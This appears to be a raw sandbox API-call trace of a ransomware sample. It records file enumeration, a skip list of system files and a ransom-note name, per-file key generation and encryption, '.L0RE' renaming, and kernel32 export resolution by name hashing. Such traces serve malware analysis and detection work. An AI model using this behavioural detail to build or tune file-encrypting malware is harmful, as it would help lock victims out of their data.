lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.733] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.733] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.733] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.733] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.733] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.733] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.733] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.733] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.733] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.733] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.733] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.733] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.733] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.733] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.daOcq") returned 79 [0185.733] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.daOcq.L0RE") returned 84 [0185.733] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.daOcq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.daocq"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.daOcq.L0RE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.daocq.l0re"), dwFlags=0x0) returned 1 [0185.734] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.734] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.734] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.735] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaef9ff40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Gallery.url.hTxRNP", cAlternateFileName="WINDOW~1.HTX")) returned 1 [0185.735] lstrcmpiW (lpString1="Windows Live Gallery.url.hTxRNP", lpString2="DECRYPT-FILES.txt") returned 1 [0185.735] lstrcmpiW (lpString1="Windows Live Gallery.url.hTxRNP", lpString2="autorun.inf") returned 1 [0185.735] lstrcmpiW (lpString1="Windows Live Gallery.url.hTxRNP", lpString2="boot.ini") returned 1 [0185.735] lstrcmpiW (lpString1="Windows Live Gallery.url.hTxRNP", lpString2="desktop.ini") returned 1 [0185.735] lstrcmpiW (lpString1="Windows Live Gallery.url.hTxRNP", lpString2="ntuser.dat") returned 1 [0185.735] lstrcmpiW (lpString1="Windows Live Gallery.url.hTxRNP", lpString2="iconcache.db") returned 1 [0185.735] lstrcmpiW (lpString1="Windows Live Gallery.url.hTxRNP", lpString2="bootsect.bak") returned 1 [0185.735] lstrcmpiW (lpString1="Windows Live Gallery.url.hTxRNP", lpString2="ntuser.dat.log") returned 1 [0185.735] lstrcmpiW (lpString1="Windows Live Gallery.url.hTxRNP", lpString2="thumbs.db") returned 1 [0185.735] lstrcmpiW (lpString1="Windows Live Gallery.url.hTxRNP", lpString2="Bootfont.bin") returned 1 [0185.735] lstrlenW (lpString="Windows Live Gallery.url.hTxRNP") returned 31 [0185.735] lstrcmpiW (lpString1="hTxRNP", lpString2="lnk") returned -1 [0185.735] lstrcmpiW (lpString1="hTxRNP", lpString2="exe") returned 1 [0185.735] lstrcmpiW (lpString1="hTxRNP", lpString2="sys") returned -1 [0185.735] lstrcmpiW (lpString1="hTxRNP", lpString2="dll") returned 1 [0185.735] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0185.735] lstrlenW (lpString="Windows Live Gallery.url.hTxRNP") returned 31 [0185.735] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0185.735] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="Windows Live Gallery.url.hTxRNP" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.hTxRNP") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.hTxRNP" [0185.735] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.735] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.hTxRNP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.htxrnp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.736] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=397) returned 1 [0185.736] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.736] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.736] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.736] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.736] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.736] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.737] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.737] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.737] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.737] CloseHandle (hObject=0x268) returned 1 [0185.737] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.737] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.738] CloseHandle (hObject=0x0) returned 0 [0185.738] CloseHandle (hObject=0x264) returned 1 [0185.738] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.739] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.739] GetTickCount () returned 0x1135abe [0185.739] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.739] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.739] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.739] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.740] lstrlenA (lpString="kernel32.dll") returned 12 [0185.740] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.740] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.740] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.740] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.740] lstrlenA (lpString="ADDATOMA") returned 8 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.740] lstrlenA (lpString="ADDATOMW") returned 8 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.740] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.740] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.740] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.740] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.740] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.740] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.740] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.740] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.740] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.740] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.740] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.741] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.741] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.741] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.741] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.741] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.741] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.741] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.741] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.741] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.741] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.741] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.741] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.741] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.741] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.741] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.741] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.741] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.741] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.741] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.742] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.742] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.742] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.742] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.742] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.742] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.742] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.742] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.742] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.742] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.742] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.742] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.742] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.742] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.742] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.742] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.742] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.742] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.742] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.742] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.742] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.742] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.742] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.742] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.742] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.742] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.742] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.742] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.743] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.743] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.743] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.743] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.743] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.743] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.743] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.743] lstrlenA (lpString="BEEP") returned 4 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.743] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.743] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.743] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.743] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.743] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.743] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.743] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.743] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.743] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.743] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.743] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.743] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.744] lstrlenA (lpString="CANCELIO") returned 8 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.744] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.744] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.744] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.744] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.744] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.744] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.744] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.744] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.744] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.744] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.744] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.744] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.744] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.744] lstrlenA 